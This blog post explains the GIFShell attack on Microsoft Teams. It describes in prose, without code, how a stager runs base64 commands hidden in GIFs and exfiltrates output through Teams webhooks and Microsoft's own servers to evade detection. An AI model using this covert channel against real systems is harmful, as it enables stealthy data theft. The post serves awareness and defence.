A new threat has emerged that exploits a vulnerability in Microsoft Teams. This attack, known as the GIFShell attack, allows threat actors to execute commands and steal data using GIFs. This blog post delves into the details of this vulnerability, its implications, and the response from Microsoft.
What is the GIFShell Attack?
The GIFShell attack is a novel technique that allows threat actors to abuse Microsoft Teams for phishing attacks and covertly executing commands to steal data using GIFs. The attack exploits a series of vulnerabilities and flaws in Microsoft Teams, using the platform’s legitimate infrastructure to deliver malicious files and commands, and exfiltrating data via GIFs. The data exfiltration is done through Microsoft’s own servers, making the traffic harder to detect by security software that sees it as legitimate Microsoft Team’s traffic.
How Does the GIFShell Attack Work?
The main component of the GIFShell attack is a reverse shell that delivers malicious commands via base64 encoded GIFs in Teams, and exfiltrates the output through GIFs retrieved by Microsoft’s own infrastructure. The attacker first convinces a user to install a malicious stager that executes commands and uploads command output via a GIF URL to a Microsoft Teams web hook. The stager continuously scans the Microsoft Teams logs for messages with a GIF, extracts the base64 encoded commands, and executes them on the device. The output of the executed command is then converted to base64 text and used as the filename for a remote GIF embedded in a Microsoft Teams Survey Card that the stager submits to the attacker’s public Microsoft Teams webhook.
Implications of the GIFShell Attack
The GIFShell attack has serious implications for cybersecurity. As the attack uses Microsoft’s servers for data exfiltration, it can bypass detection by security software. Furthermore, as Microsoft Teams runs as a background process, it does not even need to be opened by the user to receive the attacker’s commands to execute. The attack can also be used for phishing, with attackers able to send malicious files to Teams users but spoof them to look as harmless images.
Microsoft’s Response to the GIFShell Attack
Microsoft has acknowledged the research into the GIFShell attack but stated that it would not be fixed as no security boundaries were bypassed. They noted that while the research was valuable, the issues identified were post-exploitation and relied on a target already being compromised. However, Microsoft left the door open to resolving these issues in future versions of their software.
As always, users are advised to practice good computing habits online, including exercising caution when clicking on links to web pages, opening unknown files, or accepting file transfers.
